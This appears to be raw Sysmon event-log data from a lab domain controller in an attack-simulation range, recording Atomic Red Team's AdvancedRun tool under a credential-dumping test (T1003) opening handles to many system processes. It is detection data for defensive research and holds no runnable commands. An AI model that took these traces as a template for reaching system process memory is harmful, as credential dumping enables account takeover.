1b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003967348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967345Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967329Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\S